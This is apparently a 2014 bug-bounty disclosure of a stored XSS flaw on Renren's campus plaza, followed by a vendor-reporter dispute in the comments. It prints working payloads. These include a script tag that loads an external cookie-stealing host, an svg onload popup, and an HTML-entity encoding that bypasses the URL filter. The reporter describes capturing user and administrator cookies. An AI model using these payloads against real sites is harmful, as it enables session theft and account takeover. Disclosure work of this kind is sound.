人人网校园广场存在持久型xss漏洞影响首页还能打管理cookie

通过人人app提交如下代码先来APP提交页面截图：

看代码：

<script src=http://xss.name/CsWX0p></script>会被过滤成这样：<script src="alert(te)" <a="" href="http://rrurl.cn/myAuj6" target="_blank" title="http://xss.name/ceHQoI">http://rrurl.cn/myAuj6 </a> "></script>
 原来压根不过滤。看着好像没问题，但是感觉哪里不对。先试下弹窗回头试试绕过url的过滤，用这个代码：<img src=1><svg/onload=prompt(1)>直接弹了。先看图。这是首页的，直接首页弹了，影响所有访问首页的用户，不需要点击帖子什么的。

就这样，弹了。

然后来试试url的绕过。人人技术员对上一次漏洞的处理方法是：首先把=号后面的标记出来，然后对有http://头的一段内容进行分割，提取出来扔到title标签里。技术员肯定觉得这样难以绕过，能绕过也会很费力。但是你忘了重新编码，src=支持多种编码哦~那就编码试试~

为了防止泄露个人隐私，这个链接只是举例我随机删了几个字符，望包涵。
 <script src=http://XXX.XXX/CsWX0p></script>对这里的链接重新编码下~比如&#104;&116;&#112;&#58&#47;&#120;&#115;&#115;&#46;&#110;&#97&#101;&#47;&#67;&#115;&#87。然后提交~

成功了~然后看下cookie。收到一个用户cookie。然后来个管理员的

管理员的

就这样了。快去补吧

看代码：

<script src=http://xss.name/CsWX0p></script>会被过滤成这样：<script src="alert(te)" <a="" href="http://rrurl.cn/myAuj6" target="_blank" title="http://xss.name/ceHQoI">http://rrurl.cn/myAuj6 </a> "></script>
 原来压根不过滤。看着好像没问题，但是感觉哪里不对。先试下弹窗回头试试绕过url的过滤，用这个代码：<img src=1><svg/onload=prompt(1)>直接弹了。先看图。这是首页的，直接首页弹了，影响所有访问首页的用户，不需要点击帖子什么的。

就这样，弹了。

然后来试试url的绕过。人人技术员对上一次漏洞的处理方法是：首先把=号后面的标记出来，然后对有http://头的一段内容进行分割，提取出来扔到title标签里。技术员肯定觉得这样难以绕过，能绕过也会很费力。但是你忘了重新编码，src=支持多种编码哦~那就编码试试~

为了防止泄露个人隐私，这个链接只是举例我随机删了几个字符，望包涵。
 <script src=http://XXX.XXX/CsWX0p></script>对这里的链接重新编码下~比如&#104;&116;&#112;&#58&#47;&#120;&#115;&#115;&#46;&#110;&#97&#101;&#47;&#67;&#115;&#87。然后提交~

成功了~然后看下cookie。收到一个用户cookie。然后来个管理员的

管理员的

过滤策略加强，你们更专业~

厂商回应：

危害等级：中

漏洞Rank：5

确认时间：2014-11-17 17:03

厂商回复：

前面有白帽子提过，重复了，还是谢谢。

最新状态：

暂无

1. 2014-11-17 17:04 | g0odnight ( 实习白帽子 | Rank:83 漏洞数:13 | 么么哒，呵呵哒，么蛤蛤~)

   1

   前面也是我提交的，麻烦你看看清楚！你们漏洞补了，然后我又绕过了！

   1# 回复此人

2. 2014-11-17 17:05 | g0odnight ( 实习白帽子 | Rank:83 漏洞数:13 | 么么哒，呵呵哒，么蛤蛤~)

   1

   同一个提交点，漏洞补了再被绕过，就不算漏洞了?

   2# 回复此人

3. 2014-11-17 17:17 | g0odnight ( 实习白帽子 | Rank:83 漏洞数:13 | 么么哒，呵呵哒，么蛤蛤~)

   1

   @疯狗 这算厂商无视白帽子劳动成果嘛。我还真以为有谁也提交了，看了下没有啊。最近几个都是我提交的。他们补了漏洞，然后又被我挖出来就不算漏洞了么？

   3# 回复此人

4. 2014-11-17 17:30 | g0odnight ( 实习白帽子 | Rank:83 漏洞数:13 | 么么哒，呵呵哒，么蛤蛤~)

   1

   @人人网 麻烦看下，和之前我发的。我把之前发的全设成非匿名了。你们补掉的漏洞，没补好。又被绕过。请详细看下。我已经直接联系人人网校园广场的负责人。你们既然负责接收这里的漏洞通报，就请负责。

   4# 回复此人

5. 2014-11-17 17:46 | xiao.k ( 普通白帽子 | Rank:157 漏洞数:16 | 纳威网络安全导航 navisec.it)

   1

   唉~漏洞狗啊。。。帮厂商提交漏洞还需要求爷爷告奶奶的。这是什么世道。

   5# 回复此人

6. 2014-11-17 18:00 | char ( 路人 | Rank:13 漏洞数:3 | 中国平安，不只保险这么简单。)

   1

   哈哈，漏洞狗这个词精辟，跪舔厂商修复漏洞。

   6# 回复此人

7. 2014-11-17 18:10 | 人人网(乌云厂商)

   1

   @g0odnight 这算那门子绕过啊？我上周发了邮件催业务补，人家根本没补，我今天早上还又发了邮件催别人补...我真的很好奇你哪里看出来是补了被你绕过了？

   7# 回复此人

8. 2014-11-17 18:36 | g0odnight ( 实习白帽子 | Rank:83 漏洞数:13 | 么么哒，呵呵哒，么蛤蛤~)

   1

   @人人网 我之前第一次提交的时候就已经和人人校园广场的负责人说了，然后他直接让技术去补了。我在这次的提交里也标出了上次补漏洞后采用的过滤方法。第一次提交的时候是完全没有过滤。如果需要我和校园广场负责人的聊天记录截图，可以私信我。

   8# 回复此人

9. 2014-11-17 18:40 | g0odnight ( 实习白帽子 | Rank:83 漏洞数:13 | 么么哒，呵呵哒，么蛤蛤~)

   1

   @人人网 算了。不想跪舔了。就这样吧。第一次是完全没过滤，这次是加了一定的策略没起作用。反正后面出了事也不关我事。

   9# 回复此人

10. 2014-11-17 18:44 | 人人网(乌云厂商)

    1

    @g0odnight 他修复了也没找过安全中心确认过，至少今天早上我还重复发了邮件提醒这个业务没修复。既然你能和校园广场的负责人沟通，为什么不直接提醒他没修复到位呢？

    10# 回复此人

11. 2014-11-17 18:52 | g0odnight ( 实习白帽子 | Rank:83 漏洞数:13 | 么么哒，呵呵哒，么蛤蛤~)

    1

    @人人网 已经提醒了，就不能来这里提交报告嘛==、

    11# 回复此人

12. 2014-11-17 20:04 | 人人网(乌云厂商)

    1

    @g0odnight 我们也给rank不是吗？

    12# 回复此人

13. 2014-11-17 20:06 | g0odnight ( 实习白帽子 | Rank:83 漏洞数:13 | 么么哒，呵呵哒，么蛤蛤~)

    1

    @人人网 恩。我一开始以为你们知道广场那个业务的技术把漏洞补上了，然后把两个漏洞当成一个了。原来你们也不知道。搞误会了。

    13# 回复此人

14. 2014-11-17 20:07 | px1624 ( 普通白帽子 | Rank:1171 漏洞数:207 | px1624)

    1

    @g0odnight 。。。能打管理cookie，能进去不。。。

    14# 回复此人

15. 2014-11-17 20:41 | g0odnight ( 实习白帽子 | Rank:83 漏洞数:13 | 么么哒，呵呵哒，么蛤蛤~)

    1

    @px1624 上一次提交漏洞的时候测试进去了。这次因为和上次漏洞同一个点，就没测。进去了一个什么安全运营系统。

    15# 回复此人

16. 2014-11-17 20:50 | BMa ( 核心白帽子 | Rank:2078 漏洞数:218 )

    1

    @g0odnight 那就闹大发点

    16# 回复此人

17. 2014-11-17 20:54 | g0odnight ( 实习白帽子 | Rank:83 漏洞数:13 | 么么哒，呵呵哒，么蛤蛤~)

    1

    @BMa 算了不闹了。怪我私下里把漏洞给人人的一个负责人让他去通知补漏洞了。导致人人两个部门没协调好，一个补好了漏洞，另一个以为没补。下次只提交不通知了。

    17# 回复此人

18. 2014-11-17 20:59 | px1624 ( 普通白帽子 | Rank:1171 漏洞数:207 | px1624)

    1

    @人人网 我回头提交个给力的，重点功能很隐蔽的一枚储存XSS，求给力，求20rank！

    18# 回复此人

19. 2014-11-17 21:05 | g0odnight ( 实习白帽子 | Rank:83 漏洞数:13 | 么么哒，呵呵哒，么蛤蛤~)

    1

    @px1624 写全一点。感觉现在少写一些不重要的步骤也会被扣好多分，有小流程。到时候求围观

    19# 回复此人

20. 2014-11-17 22:39 | px1624 ( 普通白帽子 | Rank:1171 漏洞数:207 | px1624)

    1

    @人人网 @g0odnight 。。。不能这么说吧。比如人人网的xss，你如果只弹个窗，那有毛用啊，你盲打到后台管理，如果没证明可以登入，或者其他危害，那还是没啥用啊！既然没啥用，肯定不会给你高分或者大厂商流程了。

    20# 回复此人

21. 2014-11-19 09:28 | 人人网(乌云厂商)

    1

    @g0odnight 晕，库带上提交这个漏洞也是你吧？以后不要在一洞多投了，本来就违反乌云和库带的原则

    21# 回复此人

22. 2014-11-19 10:23 | px1624 ( 普通白帽子 | Rank:1171 漏洞数:207 | px1624)

    1

    @g0odnight @人人网 哈哈，不厚道啊。。、

    22# 回复此人

23. 2014-11-19 11:16 | 人人网(乌云厂商)

    1

    @px1624 一个洞都要被你撸出血了

    23# 回复此人

24. 2014-11-19 11:37 | px1624 ( 普通白帽子 | Rank:1171 漏洞数:207 | px1624)

    1

    @人人网 。。。有么有忍忍vip，来一发啊，快到期了

    24# 回复此人

25. 2015-01-06 14:58 | popok ( 普通白帽子 | Rank:117 漏洞数:21 | nothing)

    1

    @人人网 @px1624 一个洞都要被你撸出血了

    25# 回复此人